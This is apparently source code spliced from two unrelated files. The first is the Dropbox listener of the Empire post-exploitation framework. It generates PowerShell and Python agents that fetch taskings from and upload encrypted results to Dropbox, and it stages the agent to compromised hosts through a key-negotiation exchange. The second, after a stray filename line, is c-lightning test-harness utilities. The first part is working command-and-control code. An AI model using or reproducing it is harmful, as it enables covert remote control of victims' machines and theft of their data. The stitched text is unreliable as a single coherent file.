code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace("$AgentDelay = 60", "$AgentDelay = " + str(delay))
code = code.replace("$AgentJitter = 0", "$AgentJitter = " + str(jitter))
code = code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
'$Profile = "' + str(profile) + '"',
)
code = code.replace("$LostLimit = 60", "$LostLimit = " + str(lostLimit))
code = code.replace(
'$DefaultResponse = ""',
'$DefaultResponse = "' + b64DefaultResponse.decode("UTF-8") + '"',
)
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace(
"$KillDate,", "$KillDate = '" + str(killDate) + "',"
)
return code
elif language == "python":
if version == "ironpython":
f = open(self.mainMenu.installPath + "/data/agent/ironpython_agent.py")
else:
f = open(self.mainMenu.installPath + "/data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(
listenerOptions=listenerOptions, language=language
)
code = code.replace("REPLACE_COMMS", commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch some more
code = code.replace("delay = 60", "delay = %s" % (delay))
code = code.replace("jitter = 0.0", "jitter = %s" % (jitter))
code = code.replace(
'profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
'profile = "%s"' % (profile),
)
code = code.replace("lostLimit = 60", "lostLimit = %s" % (lostLimit))
code = code.replace(
'defaultResponse = base64.b64decode("")',
'defaultResponse = base64.b64decode("%s")'
% (b64DefaultResponse.decode("UTF-8")),
)
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace(
'workingHours = ""', 'workingHours = "%s"' % (killDate)
)
return code
else:
print(
helpers.color(
"[!] listeners/dbx generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."
)
)
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
stagingKey = listenerOptions["StagingKey"]["Value"]
pollInterval = listenerOptions["PollInterval"]["Value"]
apiToken = listenerOptions["APIToken"]["Value"]
baseFolder = listenerOptions["BaseFolder"]["Value"].strip("/")
taskingsFolder = "/%s/%s" % (
baseFolder,
listenerOptions["TaskingsFolder"]["Value"].strip("/"),
)
resultsFolder = "/%s/%s" % (
baseFolder,
listenerOptions["ResultsFolder"]["Value"].strip("/"),
)
if language:
if language.lower() == "powershell":
updateServers = f'$Script:APIToken = "{apiToken}";'
getTask = f"""
$script:GetTask = {{
try {{
# build the web request object
$wc= New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {{
$wc.Proxy = $Script:Proxy;
}}
$wc.Headers.Add("User-Agent", $script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {{$wc.Headers.Add($_.Name, $_.Value)}}
$TaskingsFolder = '{taskingsFolder}'
$wc.Headers.Set("Authorization", "Bearer $($Script:APIToken)")
$wc.Headers.Set("Dropbox-API-Arg", "{{`"path`":`"$TaskingsFolder/$($script:SessionID).txt`"}}")
$Data = $wc.DownloadData("https://content.dropboxapi.com/2/files/download")
if($Data -and ($Data.Length -ne 0)) {{
# if there was a tasking data, remove it
$wc.Headers.Add("Content-Type", " application/json")
$wc.Headers.Remove("Dropbox-API-Arg")
$Null=$wc.UploadString("https://api.dropboxapi.com/2/files/delete", "POST", "{{`"path`":`"$TaskingsFolder/$($script:SessionID).txt`"}}")
$Data
}}
$script:MissedCheckins = 0
}}
catch {{
if ($_ -match 'Unable to connect') {{
$script:MissedCheckins += 1
}}
}}
}}
"""
sendMessage = f"""
$script:SendMessage = {{
param($Packets)
if($Packets) {{
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
# build the web request object
$wc = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {{
$wc.Proxy = $Script:Proxy;
}}
$wc.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {{$wc.Headers.Add($_.Name, $_.Value)}}
$ResultsFolder = '{resultsFolder}'
try {{
# check if the results file is still in the specified location, if so then
# download the file and append the new routing packet to it
try {{
$Data = $Null
$wc.Headers.Set("Authorization", "Bearer $($Script:APIToken)");
$wc.Headers.Set("Dropbox-API-Arg", "{{`"path`":`"$ResultsFolder/$($script:SessionID).txt`"}}");
$Data = $wc.DownloadData("https://content.dropboxapi.com/2/files/download")
}}
catch {{ }}
if($Data -and $Data.Length -ne 0) {{
$RoutingPacket = $Data + $RoutingPacket
}}
$wc2 = New-Object System.Net.WebClient
$wc2.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc2.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {{
$wc2.Proxy = $Script:Proxy;
}}
$wc2.Headers.Add("Authorization", "Bearer $($Script:APIToken)")
$wc2.Headers.Add("Content-Type", "application/octet-stream")
$wc2.Headers.Add("Dropbox-API-Arg", "{{`"path`":`"$ResultsFolder/$($script:SessionID).txt`"}}");
$Null = $wc2.UploadData("https://content.dropboxapi.com/2/files/upload", "POST", $RoutingPacket)
$script:MissedCheckins = 0
}}
catch {{
if ($_ -match 'Unable to connect') {{
$script:MissedCheckins += 1
}}
}}
}}
}}
"""
return updateServers + getTask + sendMessage
elif language.lower() == "python":
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
def post_message(uri, data, headers):
req = urllib.request.Request(uri)
headers['Authorization'] = "Bearer REPLACE_API_TOKEN"
for key, value in headers.items():
req.add_header("%s"%(key),"%s"%(value))
if data:
req.data = data
o=urllib.request.build_opener()
o.add_handler(urllib.request.ProxyHandler(urllib.request.getproxies()))
urllib.request.install_opener(o)
return urllib.request.urlopen(req).read()
global missedCheckins
global headers
taskingsFolder="REPLACE_TASKSING_FOLDER"
resultsFolder="REPLACE_RESULTS_FOLDER"
data = None
requestUri=''
try:
del headers['Content-Type']
except:
pass
if packets:
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, packets)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
#check to see if there are any results already present
headers['Dropbox-API-Arg'] = "{\\"path\\":\\"%s/%s.txt\\"}" % (resultsFolder, sessionID)
try:
pkdata = post_message('https://content.dropboxapi.com/2/files/download', data=None, headers=headers)
except:
pkdata = None
if pkdata and len(pkdata) > 0:
data = pkdata + data
headers['Content-Type'] = "application/octet-stream"
requestUri = 'https://content.dropboxapi.com/2/files/upload'
else:
headers['Dropbox-API-Arg'] = "{\\"path\\":\\"%s/%s.txt\\"}" % (taskingsFolder, sessionID)
requestUri='https://content.dropboxapi.com/2/files/download'
try:
resultdata = post_message(requestUri, data, headers)
if (resultdata and len(resultdata) > 0) and requestUri.endswith('download'):
headers['Content-Type'] = "application/json"
del headers['Dropbox-API-Arg']
datastring="{\\"path\\":\\"%s/%s.txt\\"}" % (taskingsFolder, sessionID)
nothing = post_message('https://api.dropboxapi.com/2/files/delete', datastring, headers)
return ('200', resultdata)
except urllib.request.HTTPError as HTTPError:
# if the server is reached, but returns an error (like 404)
return (HTTPError.code, '')
except urllib.request.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
sendMessage = sendMessage.replace(
"REPLACE_TASKSING_FOLDER", taskingsFolder
)
sendMessage = sendMessage.replace(
"REPLACE_RESULTS_FOLDER", resultsFolder
)
sendMessage = sendMessage.replace("REPLACE_API_TOKEN", apiToken)
return sendMessage
else:
print(
helpers.color(
"[!] listeners/dbx generate_comms(): no language specified!"
)
)
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up polling server for Dropbox
polling communication.
./Empire/
./staging/
stager.ps1
SESSION_[1-4].txt
./taskings/
SESSIONID.txt
./results/
SESSIONID.txt
/Empire/staging/stager.ps1 -> RC4staging(stager.ps1) uploaded by server
/Empire/staging/sessionID_1.txt -> AESstaging(PublicKey) uploaded by client
/Empire/staging/sessionID_2.txt -> RSA(nonce+AESsession) uploaded by server
/Empire/staging/sessionID_3.txt -> AESsession(nonce+sysinfo) uploaded by client
/Empire/staging/sessionID_4.txt -> AESsession(agent.ps1) uploaded by server
client dropbox server
<- upload /Empire/staging/stager.ps1
read /Empire/staging/stager ->
<- return stager
generate sessionID
upload /Empire/staging/sessionID_1.txt ->
<- read /Empire/staging/sessionID_1.txt
<- upload /Empire/staging/sessionID_2.txt
read /Empire/staging/sessionID_2.txt ->
<- /Empire/staging/sessionID_2.txt
upload /Empire/staging/sessionID_3.txt ->
<- read /Empire/staging/sessionID_3.txt
<- upload /Empire/staging/sessionID_4.txt
read /Empire/staging/sessionID_4.txt ->
<- /Empire/staging/sessionID_4.txt
<start beaconing>
<- upload /Empire/taskings/sessionID.txt
read /Empire/taskings/sessionID.txt ->
<- /Empire/taskings/sessionID.txt
delete /Empire/taskings/sessionID.txt ->
execute code
upload /Empire/results/sessionID.txt ->
<- read /Empire/results/sessionID.txt
<- delete /Empire/results/sessionID.txt
"""
def download_file(dbx, path):
# helper to download a file at the given path
try:
md, res = dbx.files_download(path)
except dropbox.exceptions.HttpError as err:
listenerName = self.options["Name"]["Value"]
message = "[!] Error downloading data from '{}' : {}".format(path, err)
signal = json.dumps({"print": True, "message": message})
dispatcher.send(
signal, sender="listeners/dropbox/{}".format(listenerName)
)
return None
return res.content
def upload_file(dbx, path, data):
# helper to upload a file to the given path
try:
dbx.files_upload(data, path)
except dropbox.exceptions.ApiError:
listenerName = self.options["Name"]["Value"]
message = "[!] Error uploading data to '{}'".format(path)
signal = json.dumps({"print": True, "message": message})
dispatcher.send(
signal, sender="listeners/dropbox/{}".format(listenerName)
)
def delete_file(dbx, path):
# helper to delete a file at the given path
try:
dbx.files_delete(path)
except dropbox.exceptions.ApiError:
listenerName = self.options["Name"]["Value"]
message = "[!] Error deleting data at '{}'".format(path)
signal = json.dumps({"print": True, "message": message})
dispatcher.send(
signal, sender="listeners/dropbox/{}".format(listenerName)
)
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
stagingKey = listenerOptions["StagingKey"]["Value"]
pollInterval = listenerOptions["PollInterval"]["Value"]
apiToken = listenerOptions["APIToken"]["Value"]
listenerName = listenerOptions["Name"]["Value"]
baseFolder = listenerOptions["BaseFolder"]["Value"].strip("/")
stagingFolder = "/%s/%s" % (
baseFolder,
listenerOptions["StagingFolder"]["Value"].strip("/"),
)
taskingsFolder = "/%s/%s" % (
baseFolder,
listenerOptions["TaskingsFolder"]["Value"].strip("/"),
)
resultsFolder = "/%s/%s" % (
baseFolder,
listenerOptions["ResultsFolder"]["Value"].strip("/"),
)
dbx = dropbox.Dropbox(apiToken)
# ensure that the access token supplied is valid
try:
dbx.users_get_current_account()
except dropbox.exceptions.AuthError as err:
print(
helpers.color(
"[!] ERROR: Invalid access token; try re-generating an access token from the app console on the web."
)
)
return False
# setup the base folder structure we need
try:
dbx.files_create_folder(stagingFolder)
except dropbox.exceptions.ApiError:
listenerName = self.options["Name"]["Value"]
message = "[*] Dropbox folder '{}' already exists".format(stagingFolder)
signal = json.dumps({"print": False, "message": message})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
dbx.files_create_folder(taskingsFolder)
except dropbox.exceptions.ApiError:
listenerName = self.options["Name"]["Value"]
message = "[*] Dropbox folder '{}' already exists".format(taskingsFolder)
signal = json.dumps({"print": False, "message": message})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
dbx.files_create_folder(resultsFolder)
except dropbox.exceptions.ApiError:
listenerName = self.options["Name"]["Value"]
message = "[*] Dropbox folder '{}' already exists".format(resultsFolder)
signal = json.dumps({"print": False, "message": message})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
# upload the stager.ps1 code
stagerCodeps = self.generate_stager(
listenerOptions=listenerOptions, language="powershell"
)
stagerCodepy = self.generate_stager(
listenerOptions=listenerOptions, language="python"
)
try:
# delete stager if it exists
delete_file(dbx, "%s/debugps" % (stagingFolder))
delete_file(dbx, "%s/debugpy" % (stagingFolder))
dbx.files_upload(stagerCodeps, "%s/debugps" % (stagingFolder))
dbx.files_upload(stagerCodepy, "%s/debugpy" % (stagingFolder))
except dropbox.exceptions.ApiError:
print(
helpers.color(
"[!] Error uploading stager to '%s/stager'" % (stagingFolder)
)
)
return
while True:
time.sleep(int(pollInterval))
# search for anything in /Empire/staging/*
for match in dbx.files_search(stagingFolder, "*.txt").matches:
fileName = str(match.metadata.path_display)
relName = fileName.split("/")[-1][:-4]
sessionID, stage = relName.split("_")
sessionID = sessionID.upper()
if "_" in relName:
if stage == "1":
try:
md, res = dbx.files_download(fileName)
except dropbox.exceptions.HttpError as err:
listenerName = self.options["Name"]["Value"]
message = (
"[!] Error downloading data from '{}' : {}".format(
fileName, err
)
)
signal = json.dumps({"print": True, "message": message})
dispatcher.send(
signal,
sender="listeners/dropbox/{}".format(listenerName),
)
continue
stageData = res.content
dataResults = self.mainMenu.agents.handle_agent_data(
stagingKey, stageData, listenerOptions
)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
# TODO: more error checking
try:
dbx.files_delete(fileName)
except dropbox.exceptions.ApiError:
listenerName = self.options["Name"]["Value"]
message = "[!] Error deleting data at '{}'".format(
fileName
)
signal = json.dumps(
{"print": True, "message": message}
)
dispatcher.send(
signal,
sender="listeners/dropbox/{}".format(
listenerName
),
)
try:
stageName = "%s/%s_2.txt" % (
stagingFolder,
sessionID,
)
listenerName = self.options["Name"]["Value"]
message = "[*] Uploading key negotiation part 2 to {} for {}".format(
stageName, sessionID
)
signal = json.dumps(
{"print": True, "message": message}
)
dispatcher.send(
signal,
sender="listeners/dropbox/{}".format(
listenerName
),
)
dbx.files_upload(results, stageName)
except dropbox.exceptions.ApiError:
listenerName = self.options["Name"]["Value"]
message = "[!] Error uploading data to '{}'".format(
stageName
)
signal = json.dumps(
{"print": True, "message": message}
)
dispatcher.send(
signal,
sender="listeners/dropbox/{}".format(
listenerName
),
)
if stage == "3":
try:
md, res = dbx.files_download(fileName)
except dropbox.exceptions.HttpError as err:
listenerName = self.options["Name"]["Value"]
message = (
"[!] Error downloading data from '{}' : {}".format(
fileName, err
)
)
signal = json.dumps({"print": True, "message": message})
dispatcher.send(
signal,
sender="listeners/dropbox/{}".format(listenerName),
)
continue
stageData = res.content
dataResults = self.mainMenu.agents.handle_agent_data(
stagingKey, stageData, listenerOptions
)
if dataResults and len(dataResults) > 0:
# print "dataResults:",dataResults
for (language, results) in dataResults:
if results.startswith("STAGE2"):
sessionKey = self.mainMenu.agents.agents[sessionID][
"sessionKey"
]
listenerName = self.options["Name"]["Value"]
message = "[*] Sending agent (stage 2) to {} through Dropbox".format(
sessionID
)
signal = json.dumps(
{"print": True, "message": message}
)
dispatcher.send(
signal,
sender="listeners/dropbox/{}".format(
listenerName
),
)
try:
dbx.files_delete(fileName)
except dropbox.exceptions.ApiError:
listenerName = self.options["Name"]["Value"]
message = (
"[!] Error deleting data at '{}'".format(
fileName
)
)
signal = json.dumps(
{"print": True, "message": message}
)
dispatcher.send(
signal,
sender="listeners/dropbox/{}".format(
listenerName
),
)
try:
fileName2 = fileName.replace(
"%s_3.txt" % (sessionID),
"%s_2.txt" % (sessionID),
)
dbx.files_delete(fileName2)
except dropbox.exceptions.ApiError:
listenerName = self.options["Name"]["Value"]
message = (
"[!] Error deleting data at '{}'".format(
fileName2
)
)
signal = json.dumps(
{"print": True, "message": message}
)
dispatcher.send(
signal,
sender="listeners/dropbox/{}".format(
listenerName
),
)
session_info = (
Session()
.query(models.Agent)
.filter(models.Agent.session_id == sessionID)
.first()
)
if session_info.language == "ironpython":
version = "ironpython"
else:
version = ""
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(
language=language,
listenerOptions=listenerOptions,
version=version,
)
returnResults = encryption.aes_encrypt_then_hmac(
sessionKey, agentCode
)
try:
stageName = "%s/%s_4.txt" % (
stagingFolder,
sessionID,
)
listenerName = self.options["Name"]["Value"]
message = "[*] Uploading key negotiation part 4 (agent) to {} for {}".format(
stageName, sessionID
)
signal = json.dumps(
{"print": True, "message": message}
)
dispatcher.send(
signal,
sender="listeners/dropbox/{}".format(
listenerName
),
)
dbx.files_upload(returnResults, stageName)
except dropbox.exceptions.ApiError:
listenerName = self.options["Name"]["Value"]
message = (
"[!] Error uploading data to '{}'".format(
stageName
)
)
signal = json.dumps(
{"print": True, "message": message}
)
dispatcher.send(
signal,
sender="listeners/dropbox/{}".format(
listenerName
),
)
# get any taskings applicable for agents linked to this listener
sessionIDs = self.mainMenu.agents.get_agents_for_listener(listenerName)
for x in range(len(sessionIDs)):
if isinstance(sessionIDs[x], bytes):
sessionIDs[x] = sessionIDs[x].decode("UTF-8")
for sessionID in sessionIDs:
taskingData = self.mainMenu.agents.handle_agent_request(
sessionID, "powershell", stagingKey
)
if taskingData:
try:
taskingFile = "%s/%s.txt" % (taskingsFolder, sessionID)
# if the tasking file still exists, download/append + upload again
existingData = None
try:
md, res = dbx.files_download(taskingFile)
existingData = res.content
                        except Exception:
existingData = None
if existingData:
taskingData = taskingData + existingData
listenerName = self.options["Name"]["Value"]
message = "[*] Uploading agent tasks for {} to {}".format(
sessionID, taskingFile
)
signal = json.dumps({"print": False, "message": message})
dispatcher.send(
signal, sender="listeners/dropbox/{}".format(listenerName)
)
dbx.files_upload(
taskingData,
taskingFile,
mode=dropbox.files.WriteMode.overwrite,
)
except dropbox.exceptions.ApiError as e:
listenerName = self.options["Name"]["Value"]
message = (
"[!] Error uploading agent tasks for {} to {} : {}".format(
sessionID, taskingFile, e
)
)
signal = json.dumps({"print": True, "message": message})
dispatcher.send(
signal, sender="listeners/dropbox/{}".format(listenerName)
)
# check for any results returned
for match in dbx.files_search(resultsFolder, "*.txt").matches:
fileName = str(match.metadata.path_display)
sessionID = fileName.split("/")[-1][:-4]
listenerName = self.options["Name"]["Value"]
message = "[*] Downloading data for '{}' from {}".format(
sessionID, fileName
)
signal = json.dumps({"print": False, "message": message})
dispatcher.send(
signal, sender="listeners/dropbox/{}".format(listenerName)
)
try:
md, res = dbx.files_download(fileName)
except dropbox.exceptions.HttpError as err:
listenerName = self.options["Name"]["Value"]
message = "[!] Error download data from '{}' : {}".format(
fileName, err
)
signal = json.dumps({"print": True, "message": message})
dispatcher.send(
signal, sender="listeners/dropbox/{}".format(listenerName)
)
continue
responseData = res.content
try:
dbx.files_delete(fileName)
except dropbox.exceptions.ApiError:
listenerName = self.options["Name"]["Value"]
message = "[!] Error deleting data at '{}'".format(fileName)
signal = json.dumps({"print": True, "message": message})
dispatcher.send(
signal, sender="listeners/dropbox/{}".format(listenerName)
)
self.mainMenu.agents.handle_agent_data(
stagingKey, responseData, listenerOptions
)
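    # Recap of the polling loop above (describes the code as written, nothing
    # new): agents drop "<sessionID>_1.txt" / "<sessionID>_3.txt" into the
    # staging folder, the listener answers with "_2.txt" (key negotiation) and
    # "_4.txt" (the patched agent), taskings are written to
    # "<taskingsFolder>/<sessionID>.txt", and results are downloaded from
    # "<resultsFolder>/<sessionID>.txt" and then deleted.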
def start(self, name=""):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
        if not name:
            name = listenerOptions["Name"]["Value"]
        self.threads[name] = helpers.KThread(
            target=self.start_server, args=(listenerOptions,)
        )
        self.threads[name].start()
        time.sleep(3)
        # returns True if the listener successfully started, false otherwise
        return self.threads[name].is_alive()
def shutdown(self, name=""):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != "":
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(
helpers.color(
"[!] Killing listener '%s'" % (self.options["Name"]["Value"])
)
)
self.threads[self.options["Name"]["Value"]].kill()
|
utils.py
|
from bitcoin.core import COIN # type: ignore
from bitcoin.rpc import RawProxy as BitcoinProxy # type: ignore
from bitcoin.rpc import JSONRPCError
from contextlib import contextmanager
from pathlib import Path
from pyln.client import RpcError
from pyln.testing.btcproxy import BitcoinRpcProxy
from collections import OrderedDict
from decimal import Decimal
from ephemeral_port_reserve import reserve # type: ignore
from pyln.client import LightningRpc
from pyln.client import Millisatoshi
import json
import logging
import lzma
import math
import os
import psutil # type: ignore
import random
import re
import shutil
import sqlite3
import string
import struct
import subprocess
import sys
import threading
import time
import warnings
BITCOIND_CONFIG = {
"regtest": 1,
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
"fallbackfee": Decimal(1000) / COIN,
}
LIGHTNINGD_CONFIG = OrderedDict({
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"watchtime-blocks": 5,
"rescan": 1,
'disable-dns': None,
})
FUNDAMOUNT = 10**6
def env(name, default=None):
"""Access to environment variables
Allows access to environment variables, falling back to config.vars (part
of c-lightning's `./configure` output), and finally falling back to a
default value.
"""
fname = 'config.vars'
if os.path.exists(fname):
        with open(fname, 'r') as f:
            lines = f.readlines()
        config = dict([line.rstrip().split('=', 1) for line in lines])
else:
config = {}
if name in os.environ:
return os.environ[name]
elif name in config:
return config[name]
else:
return default
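# Usage sketch (illustrative values): env() prefers the process environment,
# then config.vars, then the supplied default, e.g.
#
#     env("TEST_NETWORK", "regtest")   # value from config.vars if not exported
#     env("NOT_SET_ANYWHERE", "x")     # "x"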
VALGRIND = env("VALGRIND") == "1"
TEST_NETWORK = env("TEST_NETWORK", 'regtest')
DEVELOPER = env("DEVELOPER", "0") == "1"
TEST_DEBUG = env("TEST_DEBUG", "0") == "1"
SLOW_MACHINE = env("SLOW_MACHINE", "0") == "1"
DEPRECATED_APIS = env("DEPRECATED_APIS", "0") == "1"
TIMEOUT = int(env("TIMEOUT", 180 if SLOW_MACHINE else 60))
EXPERIMENTAL_DUAL_FUND = env("EXPERIMENTAL_DUAL_FUND", "0") == "1"
def wait_for(success, timeout=TIMEOUT):
start_time = time.time()
interval = 0.25
while not success():
time_left = start_time + timeout - time.time()
if time_left <= 0:
            raise ValueError("Timeout while waiting for {}".format(success))
time.sleep(min(interval, time_left))
interval *= 2
if interval > 5:
interval = 5
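# Usage sketch (illustrative): wait_for() polls an arbitrary, side-effect-free
# predicate with exponential backoff capped at 5 seconds, e.g.
#
#     wait_for(lambda: txid in bitcoind.rpc.getrawmempool(), timeout=60)
#
# where `bitcoind` and `txid` stand in for whatever objects the caller holds.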
def write_config(filename, opts, regtest_opts=None, section_name='regtest'):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
if regtest_opts:
f.write("[{}]\n".format(section_name))
for k, v in regtest_opts.items():
f.write("{}={}\n".format(k, v))
def only_one(arr):
"""Many JSON RPC calls return an array; often we only expect a single entry
"""
assert len(arr) == 1
return arr[0]
def sync_blockheight(bitcoind, nodes):
height = bitcoind.rpc.getblockchaininfo()['blocks']
for n in nodes:
wait_for(lambda: n.rpc.getinfo()['blockheight'] == height)
def wait_channel_quiescent(n1, n2):
wait_for(lambda: only_one(only_one(n1.rpc.listpeers(n2.info['id'])['peers'])['channels'])['htlcs'] == [])
wait_for(lambda: only_one(only_one(n2.rpc.listpeers(n1.info['id'])['peers'])['channels'])['htlcs'] == [])
def get_tx_p2wsh_outnum(bitcoind, tx, amount):
"""Get output number of this tx which is p2wsh of amount"""
decoded = bitcoind.rpc.decoderawtransaction(tx, True)
for out in decoded['vout']:
if out['scriptPubKey']['type'] == 'witness_v0_scripthash':
if out['value'] == Decimal(amount) / 10**8:
return out['n']
return None
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None, verbose=True):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.env = os.environ.copy()
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
self.err_logs = []
self.prefix = ""
# Should we be logging lines we read from stdout?
self.verbose = verbose
# A filter function that'll tell us whether to filter out the line (not
# pass it to the log matcher and not print it to stdout).
self.log_filter = lambda line: False
def start(self, stdin=None, stdout=None, stderr=None):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line,
stdin=stdin,
stdout=stdout if stdout else subprocess.PIPE,
stderr=stderr,
env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
        try:
            self.proc.wait(timeout)
        except subprocess.TimeoutExpired:
            self.proc.kill()
            self.proc.wait()
self.thread.join()
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
line = line.decode('UTF-8', 'replace').rstrip()
if self.log_filter(line):
continue
if self.verbose:
sys.stdout.write("{}: {}\n".format(self.prefix, line))
with self.logs_cond:
self.logs.append(line)
                self.logs_cond.notify_all()
self.running = False
self.proc.stdout.close()
if self.proc.stderr:
for line in iter(self.proc.stderr.readline, ''):
if line is None or len(line) == 0:
break
line = line.rstrip().decode('UTF-8', 'replace')
self.err_logs.append(line)
self.proc.stderr.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def is_in_stderr(self, regex):
"""Look for `regex` in stderr."""
ex = re.compile(regex)
for l in self.err_logs:
if ex.search(l):
logging.debug("Found '%s' in stderr", regex)
return l
logging.debug("Did not find '%s' in stderr", regex)
return None
def wait_for_logs(self, regexs, timeout=TIMEOUT):
"""Look for `regexs` in the logs.
We tail the stdout of the process and look for each regex in `regexs`,
starting from last of the previous waited-for log entries (if any). We
fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
with self.logs_cond:
if pos >= len(self.logs):
if not self.running:
raise ValueError('Process died while waiting for logs')
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=TIMEOUT):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
throwaway connections. This is easier than to reach into the RPC
library to close, reopen and reauth upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
def f(*args):
logging.debug("Calling {name} with arguments {args}".format(
name=name,
args=args
))
res = proxy._call(name, *args)
logging.debug("Result for {name} call: {res}".format(
name=name,
res=res,
))
return res
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
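# Usage sketch (illustrative path): every attribute access builds a fresh
# BitcoinProxy, so a long-idle connection is never reused:
#
#     rpc = SimpleBitcoinProxy(btc_conf_file="/tmp/bitcoind-test/bitcoin.conf")
#     rpc.getblockcount()   # forwarded to bitcoind's "getblockcount" RPC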
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'bitcoind'
regtestdir = os.path.join(bitcoin_dir, 'regtest')
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
'bitcoind',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-txindex',
'-nowallet',
'-addresstype=bech32'
]
# For up to and including 0.16.1, this needs to be in main section.
BITCOIND_CONFIG['rpcport'] = rpcport
